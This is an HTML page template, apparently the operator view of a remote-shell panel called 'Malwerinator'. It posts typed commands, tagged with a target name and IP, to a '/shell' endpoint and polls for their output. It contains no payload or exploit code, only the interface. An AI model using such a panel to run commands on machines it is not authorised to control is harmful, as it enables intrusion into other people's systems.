<!DOCTYPE html>
<html>

<head>
    <title>Malwerinator</title>
    <link rel="stylesheet" href="{{url_for('static', filename='css/styles.css')}}">
    <script src="{{url_for('static', filename='js/command.js')}}" defer></script>
    <script>
      setInterval(function() {fetchResult('command');}, 1000);
    </script>
</head>

<body>
    <div class="container">
        <form action="/shell" method="post">
            <div class="form-group">
                <input type="hidden" name="name" value="{{name}}">
            </div>
            <div class="form-group">
                <input type="hidden" name="ip" value="{{ip}}">
            </div>
            <div class="form-group">
                <label class="form-label" for="command">Enter command:</label>
                <textarea class="form-textarea" id="command" name="command"
                    placeholder="Enter your command here..."></textarea>
            </div>
            <div class="form-group">
                <input class="btn" type="submit" value="Execute">
                <a class="btn btn-go-back" href="/toolkit?name={{name}}&ip={{ip}}">Go back</a>
            </div>
        </form>
        <p>Last command:</p>
        <p class="command-output">{{last_command}}</p>
        <p>Output:</p>
        <pre class="command-output" id="command-result">

        </pre>
    </div>
    <script>
        ip = "{{ip}}"
        name = "{{name}}"
    </script>
</body>

</html>